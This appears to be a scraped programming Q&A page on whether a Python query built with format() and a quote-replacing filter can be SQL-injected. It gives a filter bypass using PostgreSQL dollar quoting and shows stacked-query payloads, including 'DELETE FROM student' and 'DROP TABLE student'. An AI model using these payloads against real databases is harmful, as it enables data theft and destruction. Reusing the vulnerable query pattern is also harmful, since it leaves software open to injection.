Is there any way to exploit this code:
course = course.replace('\'', '\\\'')
query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
to create a query like:
SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = 'ABC'
Here, Python throws a syntax error:
Syntax error at or near "\":
column = \'ABC\'
The replace()
method in python replaces that. Is there any work-around so I can somehow inject something?
SOLUTION
Since I have to compare strings, and I cannot use '
because the replace()
messes it up, I used $
dollar quoting
So the course
looked like 3; SELECT * FROM student WHERE column = $$ABC$$
3; SELECT * FROM student WHERE column = $$ABC$$
if course
is "3; SELECT * FROM student WHERE column = 'ABC'"
I don't get any syntax errors but the result might not work as valid SQL:
>>> def a(course):
... course = course.replace('\'', '\\\'')
... query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
... return query
...
>>> a("3; SELECT * FROM student WHERE column = 'ABC'")
"SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = \\'ABC\\'"
But the code is indeed very exploitable if other queries are possible. For this example would work just fine:
>>> a("3; SELECT * FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student'
And so would these dangerous ones:
>>> a("3; DELETE FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; DELETE FROM student'
>>> a("DROP TABLE student")
'SELECT * FROM student WHERE cost_per_unit > DROP TABLE student'
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.